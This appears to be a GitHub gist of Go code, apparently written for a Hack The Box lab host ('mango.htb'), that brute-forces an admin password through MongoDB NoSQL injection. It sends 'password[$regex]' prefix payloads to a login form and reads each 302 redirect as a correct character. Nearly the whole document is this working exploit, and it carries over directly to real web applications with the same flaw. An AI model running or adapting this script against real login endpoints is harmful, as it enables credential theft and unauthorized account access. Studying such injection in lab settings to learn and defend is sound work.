Skip to content

Instantly share code, notes, and snippets.

@daehee daehee/main.go
Created Nov 26, 2019

Embed
What would you like to do?
Bruteforce MongoDB Credentials with Regex Match Payload
package main
import (
"fmt"
"net/http"
"net/url"
"strings"
)
// Build a rune slice of printable ASCII characters, excluding some special characters that would break the regex
func buildPrintable() []rune {
var p []rune
for i := '0'; i <= '9'; i++ {
p = append(p, i)
}
for i := 'A'; i <= 'Z'; i++ {
p = append(p, i)
}
for i := 'a'; i <= 'z'; i++ {
p = append(p, i)
}
special := "~>][<>!@#%^()@_{}"
for _, c := range special {
p = append(p, c)
}
return p
}
// Post form data with URL-encoded payload
func makePostRequest(data string) int {
u := "http://staging-order.mango.htb"
req, err := http.NewRequest("POST", u, strings.NewReader(data))
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
client := &http.Client{
// Prevent redirects
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
resp, err := client.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
return resp.StatusCode
}
func buildPostData(victim, payload string) string {
data := url.Values{}
data.Set("username", victim)
data.Set("password[$regex]", payload+".*")
return data.Encode()
}
func main() {
printable := buildPrintable()
victim := "admin"
fmt.Printf("[*] Bruteforcing password for: %s\n", victim)
for _, a := range printable {
flag := string(a)
restart := true
for restart {
restart = false
for _, c := range printable {
payload := flag + string(c)
data := buildPostData(victim, payload)
statusCode := makePostRequest(data)
if statusCode == 302 {
fmt.Println(payload)
flag = payload
restart = true
}
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.